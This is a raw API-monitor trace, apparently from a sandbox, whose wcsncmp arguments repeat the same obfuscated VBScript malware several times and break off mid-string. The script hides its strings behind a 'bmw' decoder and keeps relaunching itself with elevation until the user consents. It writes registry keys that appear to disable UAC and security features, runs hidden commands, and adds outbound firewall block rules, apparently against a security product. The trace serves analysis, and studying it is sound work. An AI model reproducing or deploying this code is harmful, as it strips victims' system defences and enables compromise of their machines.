bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.986] wcsncmp (_String1=" 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.986] wcsncmp (_String1="2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0222.986] wcsncmp (_String1="\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.986] wcsncmp (_String1="\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.987] wcsncmp (_String1="Dim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled 